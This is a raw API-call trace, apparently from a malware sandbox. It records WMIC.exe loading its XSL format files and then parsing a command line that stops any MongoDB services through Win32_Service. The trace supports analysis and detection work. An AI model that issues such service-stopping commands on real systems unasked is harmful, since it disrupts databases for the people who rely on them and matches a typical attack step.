IUnknown:Release (This=0x21ea280) returned 0x0 [0257.263] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=10, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.263] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.263] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.263] malloc (_Size=0x18) returned 0x35c7e0 [0257.263] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.263] free (_Block=0x35c7e0) [0257.263] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0257.263] malloc (_Size=0x18) returned 0x35c7e0 [0257.263] malloc (_Size=0x18) returned 0x35c800 [0257.263] SysStringLen (param_1="texttablewsys") returned 0xd [0257.263] SysStringLen (param_1="TABLE") returned 0x5 [0257.263] SysStringLen (param_1="texttablewsys") returned 0xd [0257.263] SysStringLen (param_1="XML") returned 0x3 [0257.263] SysStringLen (param_1="texttablewsys") returned 0xd [0257.264] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.264] SysStringLen (param_1="XML") returned 0x3 [0257.264] SysStringLen (param_1="texttablewsys") returned 0xd [0257.264] malloc (_Size=0x30) returned 0x358300 [0257.264] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.264] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.264] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.264] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=11, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.264] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.264] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.264] malloc (_Size=0x18) returned 0x35c820 [0257.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.264] free (_Block=0x35c820) [0257.264] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0257.264] malloc (_Size=0x18) returned 0x35c820 [0257.264] malloc (_Size=0x18) returned 0x35c840 [0257.264] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.265] SysStringLen (param_1="TABLE") returned 0x5 [0257.265] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.265] SysStringLen (param_1="XML") returned 0x3 [0257.265] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.265] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.265] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.265] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.265] malloc (_Size=0x30) returned 0x358340 [0257.265] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.265] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.265] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.265] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=12, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.265] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.265] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.265] malloc (_Size=0x18) returned 0x35c860 [0257.265] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.265] free (_Block=0x35c860) [0257.265] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0257.265] malloc (_Size=0x18) returned 0x35c860 [0257.266] malloc (_Size=0x18) returned 0x35c880 [0257.266] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.266] SysStringLen (param_1="TABLE") returned 0x5 [0257.266] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.266] SysStringLen (param_1="XML") returned 0x3 [0257.266] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.266] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.266] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.266] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.266] malloc (_Size=0x30) returned 0x358380 [0257.266] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.266] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.266] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.266] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=13, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.266] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.266] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.266] malloc (_Size=0x18) returned 0x35c8a0 [0257.266] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.267] free (_Block=0x35c8a0) [0257.267] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0257.267] malloc (_Size=0x18) returned 0x35c8a0 [0257.267] malloc (_Size=0x18) returned 0x35c8c0 [0257.267] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.267] SysStringLen (param_1="TABLE") returned 0x5 [0257.267] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.267] SysStringLen (param_1="XML") returned 0x3 [0257.267] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.267] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.267] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.267] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.267] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.267] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.267] malloc (_Size=0x30) returned 0x3583c0 [0257.267] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.267] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.267] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.267] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=14, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.267] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="texttable.xsl") returned 0x0 [0257.267] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.267] malloc (_Size=0x18) returned 0x35c8e0 [0257.267] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.268] free (_Block=0x35c8e0) [0257.268] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0257.268] malloc (_Size=0x18) returned 0x35c8e0 [0257.268] malloc (_Size=0x18) returned 0x35c900 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] SysStringLen (param_1="TABLE") returned 0x5 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] SysStringLen (param_1="XML") returned 0x3 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.268] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.268] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0257.268] malloc (_Size=0x30) returned 0x358400 [0257.268] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.268] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.268] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.268] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=15, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.268] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="htable.xsl") returned 0x0 [0257.268] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.268] malloc (_Size=0x18) returned 0x35c920 [0257.268] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.268] free (_Block=0x35c920) [0257.269] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0257.269] malloc (_Size=0x18) returned 0x35c920 [0257.269] malloc (_Size=0x18) returned 0x35c940 [0257.269] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.269] SysStringLen (param_1="TABLE") returned 0x5 [0257.269] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.269] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.269] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.269] SysStringLen (param_1="XML") returned 0x3 [0257.269] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.269] SysStringLen (param_1="texttablewsys") returned 0xd [0257.269] SysStringLen (param_1="XML") returned 0x3 [0257.269] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.269] malloc (_Size=0x30) returned 0x358440 [0257.269] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.269] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.269] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.269] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=16, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.269] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="htable.xsl") returned 0x0 [0257.269] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.269] malloc (_Size=0x18) returned 0x35c960 [0257.269] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.269] free (_Block=0x35c960) [0257.269] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0257.269] malloc (_Size=0x18) returned 0x35c960 [0257.270] malloc (_Size=0x18) returned 0x35c980 [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] SysStringLen (param_1="TABLE") returned 0x5 [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] SysStringLen (param_1="XML") returned 0x3 [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] SysStringLen (param_1="texttablewsys") returned 0xd [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0257.270] SysStringLen (param_1="XML") returned 0x3 [0257.270] SysStringLen (param_1="htable-sortby") returned 0xd [0257.270] malloc (_Size=0x30) returned 0x358480 [0257.270] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.270] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.270] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.270] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=17, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.270] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="mof.xsl") returned 0x0 [0257.270] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.270] malloc (_Size=0x18) returned 0x35c9a0 [0257.270] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.270] free (_Block=0x35c9a0) [0257.270] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0257.271] malloc (_Size=0x18) returned 0x35c9a0 [0257.271] malloc (_Size=0x18) returned 0x35c9c0 [0257.271] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.271] SysStringLen (param_1="TABLE") returned 0x5 [0257.271] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.271] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.271] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.271] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.271] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.271] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.271] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.271] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.271] malloc (_Size=0x30) returned 0x3584c0 [0257.271] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.271] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.271] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.271] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=18, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.271] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="mof.xsl") returned 0x0 [0257.271] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.271] malloc (_Size=0x18) returned 0x35c9e0 [0257.271] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.271] free (_Block=0x35c9e0) [0257.271] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0257.271] malloc (_Size=0x18) returned 0x35c9e0 [0257.271] malloc (_Size=0x18) returned 0x35ca00 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] SysStringLen (param_1="TABLE") returned 0x5 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0257.272] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.272] SysStringLen (param_1="wmiclimofformat") returned 0xf [0257.272] malloc (_Size=0x30) returned 0x358500 [0257.272] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.272] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.272] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.272] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=19, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.272] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="textvaluelist.xsl") returned 0x0 [0257.272] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.272] malloc (_Size=0x18) returned 0x35ca20 [0257.272] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.272] free (_Block=0x35ca20) [0257.272] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0257.272] malloc (_Size=0x18) returned 0x35ca20 [0257.272] malloc (_Size=0x18) returned 0x35ca40 [0257.272] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.272] SysStringLen (param_1="TABLE") returned 0x5 [0257.272] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.273] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.273] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.273] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.273] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.273] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.273] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.273] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.273] malloc (_Size=0x30) returned 0x358540 [0257.273] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.273] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.273] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.273] IXMLDOMNodeList:get_item (in: This=0x21e9cc0, index=20, listItem=0xef490 | out: listItem=0xef490*=0x21ebd50) returned 0x0 [0257.273] IXMLDOMNode:get_text (in: This=0x21ebd50, text=0xef4a0 | out: text=0xef4a0*="textvaluelist.xsl") returned 0x0 [0257.273] IXMLDOMNode:get_attributes (in: This=0x21ebd50, attributeMap=0xef498 | out: attributeMap=0xef498*=0x21e78d0) returned 0x0 [0257.273] malloc (_Size=0x18) returned 0x35ca60 [0257.273] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21e78d0, name="KEYWORD", namedItem=0xef4a8 | out: namedItem=0xef4a8*=0x21ea280) returned 0x0 [0257.273] free (_Block=0x35ca60) [0257.273] IXMLDOMNode:get_nodeValue (in: This=0x21ea280, value=0xef4e0 | out: value=0xef4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0257.273] malloc (_Size=0x18) returned 0x35ca60 [0257.273] malloc (_Size=0x18) returned 0x35ca80 [0257.273] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.273] SysStringLen (param_1="TABLE") returned 0x5 [0257.273] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.273] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.273] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.273] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0257.273] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.273] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.274] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.274] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0257.274] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0257.274] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0257.274] malloc (_Size=0x30) returned 0x358580 [0257.274] IUnknown:Release (This=0x21ebd50) returned 0x0 [0257.274] IUnknown:Release (This=0x21e78d0) returned 0x0 [0257.274] IUnknown:Release (This=0x21ea280) returned 0x0 [0257.274] IUnknown:Release (This=0x21e9cc0) returned 0x0 [0257.274] FreeThreadedDOMDocument:IUnknown:Release (This=0x21ebc50) returned 0x1 [0257.274] FreeThreadedDOMDocument:IUnknown:Release (This=0x21e71d0) returned 0x0 [0257.274] free (_Block=0x356f30) [0257.274] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice" [0257.274] malloc (_Size=0xe0) returned 0x356ef0 [0257.274] memcpy_s (in: _Destination=0x356ef0, _DestinationSize=0xde, _Source=0x1425ee, _SourceSize=0xd0 | out: _Destination=0x356ef0) returned 0x0 [0257.274] malloc (_Size=0x18) returned 0x35caa0 [0257.274] malloc (_Size=0x18) returned 0x35cac0 [0257.274] malloc (_Size=0x18) returned 0x35cae0 [0257.274] malloc (_Size=0x18) returned 0x35cb00 [0257.274] malloc (_Size=0x80) returned 0x35cd30 [0257.274] GetLocalTime (in: lpSystemTime=0xef650 | out: lpSystemTime=0xef650*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0xf, wMilliseconds=0x1df)) [0257.274] _vsnwprintf (in: _Buffer=0x35cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xef5a8 | out: _Buffer="04-28-2020T20:42:15") returned 19 [0257.274] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] malloc (_Size=0x8c) returned 0x35cdc0 [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] malloc (_Size=0x8c) returned 0x35ce60 [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] malloc (_Size=0xa) returned 0x35cb20 [0257.275] lstrlenW (lpString="path") returned 4 [0257.275] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0257.275] malloc (_Size=0xa) returned 0x35cb40 [0257.275] malloc (_Size=0x8) returned 0x357140 [0257.275] free (_Block=0x0) [0257.275] free (_Block=0x35cb20) [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] malloc (_Size=0x1c) returned 0x35cf00 [0257.275] lstrlenW (lpString="Win32_Service") returned 13 [0257.275] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0257.275] malloc (_Size=0x1c) returned 0x35cf30 [0257.275] malloc (_Size=0x10) returned 0x35cb20 [0257.275] memmove_s (in: _Destination=0x35cb20, _DestinationSize=0x8, _Source=0x357140, _SourceSize=0x8 | out: _Destination=0x35cb20) returned 0x0 [0257.275] free (_Block=0x357140) [0257.275] free (_Block=0x0) [0257.275] free (_Block=0x35cf00) [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.275] malloc (_Size=0xc) returned 0x35cb60 [0257.275] lstrlenW (lpString="where") returned 5 [0257.275] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0257.275] malloc (_Size=0xc) returned 0x35cb80 [0257.275] malloc (_Size=0x18) returned 0x35cba0 [0257.275] memmove_s (in: _Destination=0x35cba0, _DestinationSize=0x10, _Source=0x35cb20, _SourceSize=0x10 | out: _Destination=0x35cba0) returned 0x0 [0257.275] free (_Block=0x35cb20) [0257.275] free (_Block=0x0) [0257.275] free (_Block=0x35cb60) [0257.275] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.276] malloc (_Size=0x34) returned 0x3585c0 [0257.276] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0257.276] _wcsicmp (_String1="\"name like '%%MongoDB%%'\"", _String2="\"NULL\"") returned -20 [0257.276] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0257.276] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0257.276] malloc (_Size=0x34) returned 0x358600 [0257.276] malloc (_Size=0x20) returned 0x35cf00 [0257.276] memmove_s (in: _Destination=0x35cf00, _DestinationSize=0x18, _Source=0x35cba0, _SourceSize=0x18 | out: _Destination=0x35cf00) returned 0x0 [0257.276] free (_Block=0x35cba0) [0257.276] free (_Block=0x0) [0257.276] free (_Block=0x3585c0) [0257.276] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.276] malloc (_Size=0xa) returned 0x35cba0 [0257.276] lstrlenW (lpString="call") returned 4 [0257.276] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0257.276] malloc (_Size=0xa) returned 0x35cb60 [0257.276] malloc (_Size=0x30) returned 0x3585c0 [0257.276] memmove_s (in: _Destination=0x3585c0, _DestinationSize=0x20, _Source=0x35cf00, _SourceSize=0x20 | out: _Destination=0x3585c0) returned 0x0 [0257.276] free (_Block=0x35cf00) [0257.276] free (_Block=0x0) [0257.276] free (_Block=0x35cba0) [0257.276] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 69 [0257.276] malloc (_Size=0x18) returned 0x35cba0 [0257.276] lstrlenW (lpString="stopservice") returned 11 [0257.276] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0257.276] malloc (_Size=0x18) returned 0x35cb20 [0257.276] free (_Block=0x0) [0257.276] free (_Block=0x35cba0) [0257.276] malloc (_Size=0x30) returned 0x358640 [0257.276] lstrlenW (lpString="QUIT") returned 4 [0257.276] lstrlenW (lpString="path") returned 4 [0257.276] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0257.276] lstrlenW (lpString="EXIT") returned 4 [0257.277] lstrlenW (lpString="path") returned 4 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0257.277] free (_Block=0x358640) [0257.277] WbemLocator:IUnknown:AddRef (This=0x1ca1390) returned 0x2 [0257.277] malloc (_Size=0x30) returned 0x358640 [0257.277] lstrlenW (lpString="/") returned 1 [0257.277] lstrlenW (lpString="path") returned 4 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0257.277] lstrlenW (lpString="-") returned 1 [0257.277] lstrlenW (lpString="path") returned 4 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0257.277] lstrlenW (lpString="CLASS") returned 5 [0257.277] lstrlenW (lpString="path") returned 4 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0257.277] lstrlenW (lpString="PATH") returned 4 [0257.277] lstrlenW (lpString="path") returned 4 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0257.277] lstrlenW (lpString="/") returned 1 